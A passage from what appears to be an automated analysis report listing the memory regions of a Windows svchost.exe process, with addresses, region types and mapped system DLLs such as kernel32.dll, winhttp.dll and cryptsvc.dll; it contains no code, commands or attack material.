"private_0x00000000003b0000" filename = "" Region: id = 7094 start_va = 0x3c0000 end_va = 0x3cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 7095 start_va = 0x3d0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 7096 start_va = 0x4d0000 end_va = 0x657fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 7097 start_va = 0x660000 end_va = 0x7e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 7098 start_va = 0x7f0000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 7099 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 7100 start_va = 0x810000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 7101 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 7102 start_va = 0x830000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 7103 start_va = 0x840000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 7104 start_va = 0x850000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 7105 start_va = 0x860000 end_va = 0x86ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 7106 start_va = 0x870000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 7107 start_va = 0x880000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 7108 start_va = 0x890000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 7109 start_va = 0x8a0000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 7110 start_va = 0x8b0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 7111 start_va = 0x8c0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 7112 start_va = 0x8d0000 end_va = 0x8dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 7113 start_va = 0x8e0000 end_va = 0x8effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 7114 start_va = 0x8f0000 end_va = 0x8fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 7115 start_va = 0x950000 end_va = 0x9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 7116 start_va = 0x9d0000 end_va = 0xa8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 7117 start_va = 0xa90000 end_va = 0xa90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 7118 start_va = 0xaa0000 end_va = 0xaa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 7119 start_va = 0xab0000 end_va = 0xb2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 7120 start_va = 0xb30000 end_va = 0xb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 7121 start_va = 0xb40000 end_va = 0xbbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 7122 start_va = 0xbc0000 end_va = 0xe8efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7123 start_va = 0xe90000 end_va = 0xe90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 7124 start_va = 0xea0000 end_va = 0xea4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 7125 start_va = 0xeb0000 end_va = 0xeb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 7126 start_va = 0xec0000 end_va = 0xecffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 7127 start_va = 0xed0000 end_va = 0xedffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 7128 start_va = 0xee0000 end_va = 0xeeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 7129 start_va = 0xef0000 end_va = 0xefffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 7130 start_va = 0xf00000 end_va = 0xf7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 7131 start_va = 0xf80000 end_va = 0xf8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 7132 start_va = 0xf90000 end_va = 0xf9ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 7133 start_va = 0xfa0000 end_va = 0x101ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 7134 start_va = 0x1020000 end_va = 0x102ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 7135 start_va = 0x1030000 end_va = 0x103ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 7136 start_va = 0x1040000 end_va = 0x104ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 7137 start_va = 0x1050000 end_va = 0x105ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 7138 start_va = 0x1060000 end_va = 0x106ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 7139 start_va = 0x1070000 end_va = 0x107ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 7140 start_va = 0x1080000 end_va = 0x108ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 7141 start_va = 0x1090000 end_va = 0x109ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 7142 start_va = 0x10a0000 end_va = 0x10affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 7143 start_va = 0x10b0000 end_va = 0x10bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 7144 start_va = 0x10c0000 end_va = 0x10cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 7145 start_va = 0x10d0000 end_va = 0x10dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 7146 start_va = 0x10e0000 end_va = 0x115ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010e0000" filename = "" Region: id = 7147 start_va = 0x1160000 end_va = 0x116ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 7148 start_va = 0x1170000 end_va = 0x117ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001170000" filename = "" Region: id = 7149 start_va = 0x1180000 end_va = 0x1180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001180000" filename = "" Region: id = 7150 start_va = 0x1190000 end_va = 0x119ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 7151 start_va = 0x11a0000 end_va = 0x11affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 7152 start_va = 0x11b0000 end_va = 0x11bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 7153 start_va = 0x11c0000 end_va = 0x11cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 7154 start_va = 0x1220000 end_va = 0x122ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001220000" filename = "" Region: id = 7155 start_va = 0x1290000 end_va = 0x1290fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001290000" filename = "" Region: id = 7156 start_va = 0x12a0000 end_va = 0x12a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012a0000" filename = "" Region: id = 7157 start_va = 0x12b0000 end_va = 0x12bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 7158 start_va = 0x12c0000 end_va = 0x133ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 7159 start_va = 0x1390000 end_va = 0x140ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001390000" filename = "" Region: id = 7160 start_va = 0x1430000 end_va = 0x152ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001430000" filename = "" Region: id = 7161 start_va = 0x1530000 end_va = 0x162ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001530000" filename = "" Region: id = 7162 start_va = 0x1710000 end_va = 0x180ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001710000" filename = "" Region: id = 7163 start_va = 0x1880000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001880000" filename = "" Region: id = 7164 start_va = 0x1900000 end_va = 0x190ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 7165 start_va = 0x1ac0000 end_va = 0x1b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ac0000" filename = "" Region: id = 7166 start_va = 0x1b40000 end_va = 0x1c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b40000" filename = "" Region: id = 7167 start_va = 0x1c70000 end_va = 0x1ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 7168 start_va = 0x1d50000 end_va = 0x1dcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d50000" filename = "" Region: id = 7169 start_va = 0x1e00000 end_va = 0x1e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 7170 start_va = 0x1fe0000 end_va = 0x20dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 7171 start_va = 0x20e0000 end_va = 0x21dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020e0000" filename = "" Region: id = 7172 start_va = 0x21e0000 end_va = 0x31dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021e0000" filename = "" Region: id = 7173 start_va = 0x3200000 end_va = 0x327ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 7174 start_va = 0x32f0000 end_va = 0x32fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032f0000" filename = "" Region: id = 7175 start_va = 0x3330000 end_va = 0x33affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003330000" filename = "" Region: id = 7176 start_va = 0x3400000 end_va = 0x347ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 7177 start_va = 0x3650000 end_va = 0x384ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003650000" filename = "" Region: id = 7178 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7179 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7180 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7181 start_va = 0x779d0000 end_va = 0x779d6fff monitored = 0 entry_point = 0x779d106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 7182 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 7183 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 7184 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7185 start_va = 0xff300000 end_va = 0xff30afff monitored = 0 entry_point = 0xff30246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 7186 start_va = 0x7fef2750000 end_va = 0x7fef29c9fff monitored = 0 entry_point = 0x7fef2782200 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 7187 start_va = 0x7fef4f90000 end_va = 0x7fef4f97fff monitored = 0 entry_point = 0x7fef4f91414 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 7188 start_va = 0x7fef5960000 end_va = 0x7fef5970fff monitored = 0 entry_point = 0x7fef5969e7c region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 7189 start_va = 0x7fef5a10000 end_va = 0x7fef5a73fff monitored = 0 entry_point = 0x7fef5a11254 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 7190 start_va = 0x7fef5a80000 end_va = 0x7fef5af0fff monitored = 0 entry_point = 0x7fef5a81010 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 7191 start_va = 0x7fef5b00000 end_va = 0x7fef5b37fff monitored = 0 entry_point = 0x7fef5b0363c region_type = mapped_file name = "ncsi.dll" filename = "\\Windows\\System32\\ncsi.dll" (normalized: "c:\\windows\\system32\\ncsi.dll") Region: id = 7192 start_va = 0x7fef5b40000 end_va = 0x7fef5b8dfff monitored = 0 entry_point = 0x7fef5b546e0 region_type = mapped_file name = "nlasvc.dll" filename = "\\Windows\\System32\\nlasvc.dll" (normalized: "c:\\windows\\system32\\nlasvc.dll") Region: id = 7193 start_va = 0x7fef5b90000 end_va = 0x7fef5ba6fff monitored = 0 entry_point = 0x7fef5b91060 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 7194 start_va = 0x7fef5bb0000 end_va = 0x7fef5d5ffff monitored = 0 entry_point = 0x7fef5bb1010 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 7195 start_va = 0x7fef6850000 end_va = 0x7fef6876fff monitored = 0 entry_point = 0x7fef6851098 region_type = mapped_file name = "cryptnet.dll" filename = "\\Windows\\System32\\cryptnet.dll" (normalized: "c:\\windows\\system32\\cryptnet.dll") Region: id = 7196 start_va = 0x7fef6880000 end_va = 0x7fef68b2fff monitored = 0 entry_point = 0x7fef688423c region_type = mapped_file name = "cryptsvc.dll" filename = "\\Windows\\System32\\cryptsvc.dll" (normalized: "c:\\windows\\system32\\cryptsvc.dll") Region: id = 7197 start_va = 0x7fef8060000 end_va = 0x7fef807ffff monitored = 0 entry_point = 0x7fef8061064 region_type = mapped_file name = "wkssvc.dll" filename = "\\Windows\\System32\\wkssvc.dll" (normalized: "c:\\windows\\system32\\wkssvc.dll") Region: id = 7198 start_va = 0x7fef8470000 end_va = 0x7fef849ffff monitored = 0 entry_point = 0x7fef847c1fc region_type = mapped_file name = "dnsrslvr.dll" filename = "\\Windows\\System32\\dnsrslvr.dll" (normalized: "c:\\windows\\system32\\dnsrslvr.dll") Region: id = 7199 start_va = 0x7fef9100000 end_va = 0x7fef9117fff monitored = 0 entry_point = 0x7fef9101bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 7200 start_va = 0x7fef9120000 end_va = 0x7fef9130fff monitored = 0 entry_point = 0x7fef91216ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 7201 start_va = 0x7fef9150000 end_va = 0x7fef91a2fff monitored = 0 entry_point = 0x7fef9152b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 7202 start_va = 0x7fef91d0000 end_va = 0x7fef91d6fff monitored = 0 entry_point = 0x7fef91d15d8 region_type = mapped_file name = "dnsext.dll" filename = "\\Windows\\System32\\dnsext.dll" (normalized: "c:\\windows\\system32\\dnsext.dll") Region: id = 7203 start_va = 0x7fefb230000 end_va = 0x7fefb23afff monitored = 0 entry_point = 0x7fefb231198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 7204 start_va = 0x7fefb240000 end_va = 0x7fefb266fff monitored = 0 entry_point = 0x7fefb2498bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 7205 start_va = 0x7fefb270000 end_va = 0x7fefb2d6fff monitored = 0 entry_point = 0x7fefb286060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 7206 start_va = 0x7fefb320000 end_va = 0x7fefb338fff monitored = 0 entry_point = 0x7fefb3211a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 7207 start_va = 0x7fefb920000 end_va = 0x7fefb933fff monitored = 0 entry_point = 0x7fefb9216b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 7208 start_va = 0x7fefb940000 end_va = 0x7fefb954fff monitored = 0 entry_point = 0x7fefb941050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 7209 start_va = 0x7fefb960000 end_va = 0x7fefb96bfff monitored = 0 entry_point = 0x7fefb9618a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 7210 start_va = 0x7fefbaa0000 end_va = 0x7fefbab0fff monitored = 0 entry_point = 0x7fefbaa1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 7211 start_va = 0x7fefc0d0000 end_va = 0x7fefc1fbfff monitored = 0 entry_point = 0x7fefc0d94bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 7212 start_va = 0x7fefc200000 end_va = 0x7fefc21cfff monitored = 0 entry_point = 0x7fefc201ef4 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 7213 start_va = 0x7fefc9e0000 end_va = 0x7fefc9e6fff monitored = 0 entry_point = 0x7fefc9e14b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 7214 start_va = 0x7fefcad0000 end_va = 0x7fefcaeafff monitored = 0 entry_point = 0x7fefcad2068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 7215 start_va = 0x7fefcaf0000 end_va = 0x7fefcb0dfff monitored = 0 entry_point = 0x7fefcaf13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 7216 start_va = 0x7fefcc40000 end_va = 0x7fefcc49fff monitored = 0 entry_point = 0x7fefcc43cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 7217 start_va = 0x7fefcc80000 end_va = 0x7fefcccbfff monitored = 0 entry_point = 0x7fefcc87950 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 7218 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 7219 start_va = 0x7fefce60000 end_va = 0x7fefcebafff monitored = 0 entry_point = 0x7fefce66940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 7220 start_va = 0x7fefcfd0000 end_va = 0x7fefcfd6fff monitored = 0 entry_point = 0x7fefcfd142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 7221 start_va = 0x7fefcfe0000 end_va = 0x7fefd034fff monitored = 0 entry_point = 0x7fefcfe1054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 7222 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 7223 start_va = 0x7fefd150000 end_va = 0x7fefd181fff monitored = 0 entry_point = 0x7fefd15144c region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 7224 start_va = 0x7fefd190000 end_va = 0x7fefd1b1fff monitored = 0 entry_point = 0x7fefd195d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 7225 start_va = 0x7fefd250000 end_va = 0x7fefd2bcfff monitored = 0 entry_point = 0x7fefd251010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 7226 start_va = 0x7fefd5e0000 end_va = 0x7fefd5eafff monitored = 0 entry_point = 0x7fefd5e1030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 7227 start_va = 0x7fefd610000 end_va = 0x7fefd634fff monitored = 0 entry_point = 0x7fefd619658 region_type = mapped_file name = "sspicli.dll" filename = 